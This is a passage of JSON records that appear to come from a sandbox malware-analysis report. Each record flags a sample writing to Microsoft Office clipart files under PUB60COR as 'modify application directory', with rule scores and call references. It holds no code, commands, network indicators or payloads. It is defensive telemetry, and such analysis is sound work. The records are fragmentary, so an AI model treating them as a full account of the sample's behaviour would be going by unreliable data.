"built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33500", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33509", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33516", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33523", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33538", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33545", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33552", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33559", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33566", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33573", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33580", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33587", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33594", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33601", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33608", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33615", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33622", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33629", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33636", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33643", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33650", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33657", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33664", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33673", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33682", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33693", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33704", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33711", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33720", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33727", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33736", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33747", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", 